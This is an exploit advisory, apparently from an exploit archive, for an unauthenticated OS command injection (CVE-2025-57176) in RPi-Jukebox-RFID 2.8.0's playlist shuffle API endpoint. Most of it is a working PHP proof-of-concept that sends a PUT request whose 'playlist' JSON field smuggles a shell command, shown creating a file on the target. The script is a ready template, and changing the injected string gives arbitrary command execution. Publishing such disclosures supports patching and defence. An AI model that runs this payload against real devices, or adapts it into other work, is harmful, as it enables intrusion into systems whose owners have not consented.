RPi-Jukebox-RFID 2.8.0 Command Injection

RPi-Jukebox-RFID 2.8.0 Command Injection

=============================================================================================================================================
| # Title RPi-Jukebox-RFID 2.8.0 Command Injection

=============================================================================================================================================
| # Title : RPi-Jukebox-RFID 2.8.0 OS Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/MiczFlor/RPi-Jukebox-RFID |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176

[+] Summary : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
/phoniebox/api/playlist/shuffle.php
The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
remote attackers to execute arbitrary system commands.

[+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.

php poc.php

<?php


$target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";

$injectedCommand = "test';touch indoushka.txt;echo '";

$data = json_encode([
"playlist" => $injectedCommand,
"shuffle" => "true"
]);

$headers = [
"Content-Type: application/json",
"User-Agent: Mozilla/5.0"
];

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);

echo "[+] Sending malicious JSON payload...\n";
$response = curl_exec($ch);

if ($response === false) {
echo "[-] cURL Error: " . curl_error($ch) . "\n";
} else {
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] HTTP Status Code: {$httpCode}\n";
echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
}

curl_close($ch);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================